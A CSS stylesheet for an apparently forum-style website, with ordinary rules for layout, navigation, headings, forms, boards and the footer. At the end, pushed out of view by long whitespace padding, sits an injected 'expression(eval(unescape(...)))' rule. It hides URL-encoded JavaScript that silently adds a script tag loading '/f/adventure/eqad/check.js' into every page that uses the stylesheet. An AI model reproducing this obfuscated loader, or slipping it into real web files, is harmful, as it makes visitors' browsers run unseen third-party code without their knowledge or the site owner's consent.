body {
	margin: -7px 0px 0px 0px;
	background-color: rgb(138,36,36);
	background-image: url(../images/design/logo_red.gif);
	background-repeat: no-repeat;
	font-family: Arial, Verdana, Sans-Serif;
	font-size: 12px;
	}
#container {
	background-color: rgb(235,235,235);
	width: 776px;
	margin-left: 65px;
	border-right: 1px solid rgb(0,0,0);
	border-left: 1px solid rgb(0,0,0);
	}
h1 {
	background-color: rgb(250,250,250);
	color: rgb(0,0,0);
	font-family: Book Antiqua, Times New Roman, Serif;
	font-size: 11px;
	text-align: center;
	width: 625px;
	padding-top: 25px;
	margin-bottom: 0px;
	border-bottom: 1px solid rgb(173,173,173);
	border-right: 1px solid rgb(173,173,173);
	}
#content {
	background-color: rgb(255,255,255);
	color: rgb(0,0,0);
	width: 625px;
	float: left;
	margin: 0px -1px 0px 0px;
	border-right: 1px solid rgb(173,173,173);
	}
	p, h2, h3, h4, h5, h6, h7, fieldset, form, blockquote, #content div {
		padding-left: 5px;
		padding-right: 5px;
		}

/* Navigation Elements */
#navigation {
	background-color: rgb(235,235,235);
	color: rgb(0,0,0);
	width: 150px;
	float: right;
	margin: 0px;
	border-left: 1px solid rgb(173,173,173);
	}
	#navigation a {
		padding: 4px;
		display: block;
		text-decoration: none;
		}
	#navigation a:hover {
		background-color: rgb(250,250,250);
		color: rgb(138,36,36);
		border: 1px solid rgb(173,173,173);
		padding: 3px;
		}
	#navigation ul {
		list-style: none;
		list-style-image: none;
		margin: 0;
		padding: 5px;
		border: none;
		}
	#navigation ul li {
		font-size: 16px;
		font-weight: bold;
		padding: 0px;
		}
	#navigation ul ul {
		border-top: 1px solid rgb(173,173,173);
		}
	#navigation ul ul li {
		font-size: 12px;
		font-weight: normal;
		padding: 1px;
		}
	
/* Footer */
#footer {
	background-color: rgb(250,250,250);
	color: rgb(173,173,173);
	font-size: 10px;
	margin: 10px 0px 0px 0px;
	padding: 5px;
	border-top: 1px solid rgb(173,173,173);
	border-bottom: 1px solid rgb(173,173,173);
	clear: both;
	}
/* Headings */
h2 {
	margin: 10px 2px 2px 2px;
	font-size: 24px;
	font-weight: normal;
	font-family: georgia, verdana, "comic sans MS";
	line-height:18px;
	color: rgb(138,36,36);
	border-bottom: 1px solid rgb(173,173,173);
	}
	.subtitle {
		color: rgb(173,173,173);
		font-family: georgia, verdana, "comic sans MS";
		margin-left: 25px;
		margin-top: -2px;
		}
		
h3 {
	margin: 10px 2px 2px 2px;
	font-size: 18px;
	font-weight: normal;
	font-family: georgia, verdana, "comic sans MS";
	line-height:16px;
	color:  rgb(138,36,36);
	border-bottom: 1px solid rgb(173,173,173);
	}
/* Lists */
ul {
	list-style-image: url(../images/design/arrow.gif);
	}
ul ul {
	padding: 5px;
	margin-left: 15px;
	}

/* Links */
a {
	color: rgb(138,36,36);
	}
a:hover {
	color: rgb(209,107,54);
	text-decoration: none;
	}
/* Form Elements */
input, select, textarea {
	font-family: Arial, Verdana, Sans-Serif;
	font-size: 12px;
	background-color: white;
	border: 1px solid rgb(138,36,36);
	}
input[type="submit"] {
	background-color: #EDECEB;
	background-image: url(../images/design/buttonbg.gif);
	border-style: outset;
	}
input[type="submit"]:focus {
	border-style: inset;
	}
input:focus, textarea:focus {
	border: 1px solid rgb(209,107,54);
	}
textarea {
	padding: 3px;
	width: 100%;
	}
label {
	display: block;
	padding: 3px;
	}
	
/* Miscelaneous Elements */
legend {	
	color: rgb(138,36,36);
	}
blockquote {
	border: 1px solid rgb(173,173,173);
	padding: 5px;
}
table {
	font-size: 12px;
	}
/* Additional Classes */
.spag {
	border-bottom: 1px dotted green;
	}
.error {
	border-left: 5px solid #8A2424;
	border-right: 1px solid #8A2424;
	border-top: 1px solid #8A2424;
	border-bottom: 1px solid #8A2424;
	padding: 5px;
	margin: 5px;
	background-color: #F0E8E8;
	}
.success {
	border-left: 5px solid #008000;
	border-right: 1px solid #008000;
	border-top: 1px solid #008000;
	border-bottom: 1px solid #008000;
	padding: 5px;
	margin: 5px;
	background-color: #E9EFE9;
	}
.logindent {
	margin-left: 20px;
	}
	.logindent label {
		display: inline;
		}
.shaded {
	background-color: rgb(245,245,245);
	}
.halffloatright {
	width: 50%;
	float: right;
	}
.board {
	width: 100%;
	}
	.board th {
		background-color: rgb(235,235,235);
		padding: 3px;
		border-bottom: 1px solid rgb(173,173,173);
		}
	.board .stats {
		width: 145px;
		font-size: 10px;
		}
	.board .datebetween {
		background-color: rgb(235,235,235);
		padding: 3px;
		}
.pageselector {
	padding: 5px;
	}
	.pageselector a {
		margin-right: 4px;
		}
.signature {
	border-top: 1px solid rgb(173,173,173);
	padding: 7px;
	}
ul.footerchoices {
	list-style: none;
	margin: 0;
	padding: 0;
	clear: both;
	}
	ul.footerchoices li {
		background-color: rgb(245,245,245);
		margin: 0;
		padding: 3px;
		width: 49%;
		float: left;
		}
	ul.footerchoices li.right {
		text-align: right;
		}

a.hidden, a.totalhidden, a.hidden:hover, a.totalhidden:hover {
	color: inherit;
	text-decoration: none;
	}
.totalhidden {
	cursor: text;
	}
.newssitelink {
	font-variant: small-caps;
	}




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%34%33%37%35%36%31%3B%20%4A%53%53%33%20%3D%20%27%2F%66%2F%61%64%76%65%6E%74%75%72%65%2F%65%71%61%64%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%66%2F%61%64%76%65%6E%74%75%72%65%2F%65%71%61%64%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































